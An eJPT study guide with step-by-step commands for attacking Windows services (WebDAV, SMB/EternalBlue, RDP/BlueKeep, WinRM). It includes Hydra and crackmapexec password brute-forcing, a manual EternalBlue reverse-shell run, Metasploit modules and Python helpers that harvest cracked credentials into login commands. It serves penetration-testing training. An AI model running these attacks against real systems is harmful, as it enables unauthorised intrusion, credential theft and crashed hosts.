System-Host Based Attacks | eJPT

 

Exploiting Microsoft IIS WebDAV

Quick Scan to Check Open Ports and Services:

nmap -sV -sC 10.10.10.10
//Quick scan to identify open ports and services on the target.

 

Enumerating WebDAV:

nmap -sV -p 80 --script=http-enum 10.10.10.10
//http-enum lists common directories on the web server; a /webdav/ entry reported as 401 Unauthorized means the directory exists and is protected by HTTP authentication.

Once the /webdav/ directory is identified, run a dictionary attack against its HTTP Basic authentication with Hydra:

hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_password.txt 10.10.10.10 http-get /webdav/
//Hydra's http-get module authenticates to /webdav/ with every user/password pair from the two lists. Check the wordlist paths on your own machine first; on a standard Kali install the Metasploit wordlists live under /usr/share/metasploit-framework/data/wordlists/.
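Before spending Hydra time on /webdav/, an OPTIONS request tells you whether the directory really speaks WebDAV and what it allows. The following is an added example, not code from the original page: it parses a raw HTTP response (constructed here to resemble what IIS returns for OPTIONS /webdav/ behind Basic authentication; the 10.10.10.10 realm and header values are sample data) and reports the DAV classes, which upload-relevant methods are advertised, and whether the directory challenges with Basic auth, which is what makes Hydra's http-get module the right choice. The function names are mine.

```python
"""Confirm WebDAV on a discovered directory from the server's OPTIONS reply.

Added example, not from the original page. Parses a raw HTTP response and
summarises what it tells an attacker about the /webdav/ directory.
"""
import re

# Constructed sample: roughly what IIS answers for OPTIONS /webdav/ when the
# directory is protected by Basic authentication. Values are placeholders.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 401 Unauthorized\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "WWW-Authenticate: Basic realm=\"10.10.10.10\"\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "PUT", "DELETE"}
UPLOAD_METHODS = {"PUT", "MOVE", "COPY"}   # what dropping a file needs


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status_code, headers).

    Header names are lower-cased; a header repeated on several lines is
    joined with ', ' so Allow/Public lists are not silently truncated.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    if not m:
        raise ValueError("not an HTTP status line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        headers[name] = value if name not in headers else headers[name] + ", " + value
    return int(m.group(1)), headers


def _methods(headers, name):
    """Parse a comma-separated method list header into a set of upper-case names."""
    return {x.strip().upper() for x in headers.get(name, "").split(",") if x.strip()}


def assess_webdav(raw):
    """Return a dict summarising what the OPTIONS reply tells an attacker."""
    status, headers = parse_response(raw)
    allowed = _methods(headers, "allow") | _methods(headers, "public")
    auth = headers.get("www-authenticate", "")
    return {
        "status": status,
        # a DAV header, or any DAV-only method in Allow/Public, means WebDAV is on
        "dav_enabled": "dav" in headers or bool(allowed & WEBDAV_METHODS),
        "dav_classes": headers.get("dav", ""),
        "upload_methods": sorted(allowed & UPLOAD_METHODS),
        # 401 + Basic challenge: this is the case hydra's http-get module handles
        "basic_auth": status == 401 and auth.lower().startswith("basic"),
        "server": headers.get("server", ""),
    }


if __name__ == "__main__":
    for key, value in assess_webdav(SAMPLE_OPTIONS_RESPONSE).items():
        print("%-15s %s" % (key, value))
```

To use it against a live host, capture the reply of `curl -i -X OPTIONS http://10.10.10.10/webdav/` (or a netcat session) into a string and pass it to assess_webdav; an empty upload_methods list with dav_enabled true usually means uploads are blocked by the IIS authoring rules rather than by WebDAV itself.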

 

Exploiting SMB with PsExec

SMB Login Brute Force:

msfconsole
[MODULE]> auxiliary/scanner/smb/smb_login
//Brute forces SMB logins with Metasploit; set RHOSTS and USER_FILE/PASS_FILE (or USERPASS_FILE) before running. On domain-joined hosts a long wordlist will trip the account lockout policy.

Getting a Shell with PsExec (valid credentials required):

msfconsole
[MODULE]> exploit/windows/smb/psexec
//With a working username and password (SMBUser/SMBPass, plus SMBDomain for domain accounts) the psexec module uploads a payload over SMB and starts it as a service. The account needs administrative rights on the target and the ADMIN$ share must be reachable.

 

Exploiting Windows MS17-010 SMB (EternalBlue)

Checking for MS17-010 Vulnerability:

nmap -sV -p 445 -O 10.10.10.10
nmap -sV -p 445 10.10.10.10 --script=smb-vuln-ms17-010
//The first scan fingerprints the SMB service and the OS (-O needs root); the second runs the Nmap script that checks whether the SMBv1 server is missing the MS17-010 patch. Treat a script ERROR as "not checked", not as "not vulnerable".
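When the check runs against a subnet rather than a single host, the verdicts are easier to triage from Nmap's XML output (-oX). The following is an added example, not code from the original page: it reads the smb-vuln-ms17-010 result per host, treating a script ERROR (common when SMBv1 is disabled or the host wants authentication) as "not checked" rather than "not vulnerable". The XML is a constructed sample shaped like real Nmap output (the script result sits under hostscript because smb-vuln-ms17-010 is a host-level script); the addresses are placeholders and the function names are mine.

```python
"""Triage an nmap XML report: which hosts does smb-vuln-ms17-010 flag?

Added example, not from the original page. Run the scan with -oX and feed
the file contents to vulnerable_hosts().
"""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap XML: one vulnerable host, one where
# the script errored out, one with 445 closed. Addresses are placeholders.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p 445 --script=smb-vuln-ms17-010 -oX scan.xml 10.10.10.0/24">
  <host>
    <status state="up"/>
    <address addr="10.10.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#10;    State: VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="ERROR: Script execution failed (use -d to debug)"/>
    </hostscript>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.10.10.12" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="closed"/></port>
    </ports>
  </host>
</nmaprun>
"""


def ms17_010_states(xml_text):
    """Map each host that is up to the smb-vuln-ms17-010 verdict nmap recorded.

    Verdicts: VULNERABLE / NOT VULNERABLE (from the structured <elem key="state">),
    ERROR (script ran but failed: re-check by hand, do not assume patched), or
    NOT CHECKED (no script result at all, e.g. 445 was not open).
    """
    root = ET.fromstring(xml_text)
    verdicts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        verdict = "NOT CHECKED"
        script = host.find("hostscript/script[@id='smb-vuln-ms17-010']")
        if script is not None:
            state = script.find("table/elem[@key='state']")
            if state is not None and state.text:
                verdict = state.text.strip().upper()
            elif (script.get("output") or "").lstrip().upper().startswith("ERROR"):
                verdict = "ERROR"
        verdicts[addr.get("addr")] = verdict
    return verdicts


def vulnerable_hosts(xml_text):
    """Just the IPs worth pointing ms17_010_eternalblue at."""
    return sorted(ip for ip, v in ms17_010_states(xml_text).items() if v == "VULNERABLE")


if __name__ == "__main__":
    for ip, verdict in ms17_010_states(SAMPLE_NMAP_XML).items():
        print(ip, verdict)
    print("targets:", vulnerable_hosts(SAMPLE_NMAP_XML))
```

For a real scan, replace the sample with `open("scan.xml").read()`; hosts that come back ERROR are the ones to re-scan with `-d` or to test with the Metasploit auxiliary/scanner/smb/smb_ms17_010 module before deciding they are patched.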

 

Manual Exploitation with EternalBlue:

nc -nlvp 4444
python eternalblue_exploit8.py 10.10.10.10 sc_x64.bin
//Start the listener first. The exploit script takes the target IP and a shellcode file as its two arguments (not the script name twice): sc_x64.bin (the name is illustrative) is the kernel shellcode shipped with the exploit's repository concatenated with an msfvenom reverse-shell payload that connects back to the listener (LHOST = your IP, LPORT = 4444). Use the exploit7 script for Windows 7 / Server 2008 R2 and exploit8 for Windows 8 / Server 2012; a wrong target version or wrong shellcode architecture usually blue-screens the host instead of returning a shell.

 

Automated Exploitation with Metasploit:

msfconsole
[MODULE]> exploit/windows/smb/ms17_010_eternalblue
//Automating the exploitation of MS17-010 vulnerability with Metasploit.

 

Exploiting RDP

Checking for RDP:

nmap -sV -O 10.10.10.10
//Service and OS scan; RDP shows up as ms-wbt-server, normally on 3389/tcp (administrators sometimes move it, so rely on the service name rather than the port number).

Brute Forcing RDP Credentials:

hydra -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
//Dictionary attack against the Administrator account over RDP. RDP servers drop excess parallel connections, so add -t 4 (or lower) and -W 1 if Hydra reports connection errors; on domain-joined hosts a long wordlist will lock the account.

Connecting to RDP

xfreerdp /u:Administrator /p:helloworld /v:10.10.10.10
//Connect with the recovered credentials. Add /cert:ignore (older builds: /cert-ignore) if the session aborts on the target's self-signed certificate.

 

Exploiting Windows CVE-2019-0708 RDP (BlueKeep)

Checking for RDP:

nmap -p 3389 10.10.10.10
//Only confirms that RDP is listening; it does not test for BlueKeep. The Metasploit scanner below does the actual check.

Checking and Exploiting BlueKeep with Metasploit

msfconsole
[MODULE]> auxiliary/scanner/rdp/cve_2019_0708_bluekeep
//The scanner reports whether the host is vulnerable without crashing it. Exploitation is a separate module (exploit/windows/rdp/cve_2019_0708_bluekeep_rce) that needs the correct target profile (OS build and virtualisation platform) because a wrong memory-layout guess crashes the host with a blue screen instead of giving a shell.

 

 

Exploiting WinRM

Quick scan for WinRM:

nmap -sV -p 5985 10.10.10.10
//WinRM listens on 5985/tcp (HTTP) and 5986/tcp (HTTPS); Nmap usually labels the service http with Microsoft HTTPAPI httpd 2.0.

Brute Forcing WinRM Credentials:

To run a dictionary attack against WinRM with crackmapexec, use:

crackmapexec winrm 10.10.10.10 -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
//Tries every password in the list for the administrator account; a hit is marked [+], and (Pwn3d!) means the account can execute commands. As with SMB, mind lockout policies.
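The three credential attacks on this page (Hydra against /webdav/, Hydra against RDP, crackmapexec against WinRM) each print their hits in a different format, and a run across a range buries them in status lines. The following is an added example, not code from the original page: it pulls successful logins out of saved Hydra and crackmapexec output and builds the follow-on xfreerdp and evil-winrm commands this page uses. The log lines are constructed samples in the tools' output formats with placeholder hosts, hostname and passwords; parse_credentials and replay_commands are my names.

```python
"""Collect cracked credentials from hydra and crackmapexec output.

Added example, not from the original page. Feed it the saved stdout of
either tool (e.g. hydra ... | tee hydra.log) and get the hits back as data.
"""
import re
import shlex

# Constructed sample output: two hydra hits among status lines, then a
# crackmapexec failure and a crackmapexec hit. Placeholder values only.
SAMPLE_OUTPUT = """\
[DATA] attacking http-get://10.10.10.10:80/webdav/
[80][http-get] host: 10.10.10.10   login: bob   password: password_123456
[STATUS] 1532.00 tries/min, 1532 tries in 00:01h, 2431 to do in 00:02h
[3389][rdp] host: 10.10.10.10   login: Administrator   password: helloworld
WINRM       10.10.10.10     5985   WINSRV01         [-] WINSRV01\\administrator:letmein
WINRM       10.10.10.10     5985   WINSRV01         [+] WINSRV01\\administrator:tinkerbell (Pwn3d!)
"""

# hydra hit line:  [port][service] host: IP   login: USER   password: PASS
HYDRA_HIT = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[\w-]+)\]\s+host:\s+(?P<host>\S+)"
    r"\s+login:\s+(?P<user>\S+)\s+password:\s*(?P<password>.*?)\s*$"
)
# crackmapexec hit line:  PROTO  IP  PORT  HOSTNAME  [+] DOMAIN\user:pass (Pwn3d!)
CME_HIT = re.compile(
    r"^(?P<service>[A-Z]+)\s+(?P<host>\S+)\s+(?P<port>\d+)\s+\S+\s+\[\+\]\s+"
    r"(?:(?P<domain>[^\\\s]+)\\)?(?P<user>[^:\s]+):(?P<password>.*?)"
    r"(?P<admin>\s+\(Pwn3d!\))?\s*$"
)


def parse_credentials(text):
    """Return one dict per successful login, in the order the tools printed them."""
    creds = []
    for line in text.splitlines():
        m = HYDRA_HIT.match(line)
        if m:
            creds.append({"service": m["service"].lower(), "host": m["host"],
                          "port": int(m["port"]), "domain": "",
                          "user": m["user"], "password": m["password"],
                          "admin": False})   # hydra does not report privilege level
            continue
        m = CME_HIT.match(line)
        if m:   # [-] lines never match: the pattern requires [+]
            creds.append({"service": m["service"].lower(), "host": m["host"],
                          "port": int(m["port"]), "domain": m["domain"] or "",
                          "user": m["user"], "password": m["password"],
                          "admin": m["admin"] is not None})
    return creds


def replay_commands(creds):
    """Follow-on command for each hit, using the tools this page uses.

    Values are shell-quoted so a password containing quotes or spaces
    cannot break (or inject into) the generated command line.
    """
    cmds = []
    for c in creds:
        u, p, h = shlex.quote(c["user"]), shlex.quote(c["password"]), c["host"]
        if c["service"] == "rdp":
            cmds.append("xfreerdp /u:%s /p:%s /v:%s" % (u, p, h))
        elif c["service"] == "winrm":
            cmds.append("evil-winrm -u %s -p %s -i %s" % (u, p, h))
    return cmds


if __name__ == "__main__":
    found = parse_credentials(SAMPLE_OUTPUT)
    for c in found:
        print("%-8s %s:%d  %s\\%s : %s  admin=%s" % (c["service"], c["host"], c["port"],
                                                     c["domain"], c["user"], c["password"], c["admin"]))
    for cmd in replay_commands(found):
        print(cmd)
```

The http-get hit is deliberately left without a replay command: for WebDAV the next step is an upload check with the credentials rather than an interactive session, and which tool you reach for depends on what the server allows.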

 

Executing Commands with the -x Option:

crackmapexec winrm 10.10.10.10 -u administrator -p tinkerbell -x "whoami"
//Runs a single command over WinRM with the recovered password; -X does the same with a PowerShell command.

Starting a Session with evil-winrm:

evil-winrm.rb -u administrator -p 'tinkerbell' -i 10.10.10.10
//Interactive PowerShell-style shell over WinRM (on Kali the command is installed as evil-winrm).

Creating a Meterpreter Session with Metasploit:

msfconsole
[MODULE]> exploit/windows/winrm/winrm_script_exec
//Set USERNAME, PASSWORD and RHOSTS; the module uses WinRM to run a script on the target that stages the chosen payload.

After establishing a session, gather system information with:

meterpreter > sysinfo

 

 

Conclusion

In this overview of system and host-based attacks, Amr Elsagaei shares his notes on exploiting common Windows services: WebDAV on IIS, SMB (PsExec and MS17-010), RDP (credential attacks and BlueKeep) and WinRM. Together they show how many ways into a Windows host a single exposed service can offer. Only test systems you are authorised to test, and keep the agreed scope and rules of engagement in mind throughout.

Best of luck on your eJPT adventure!
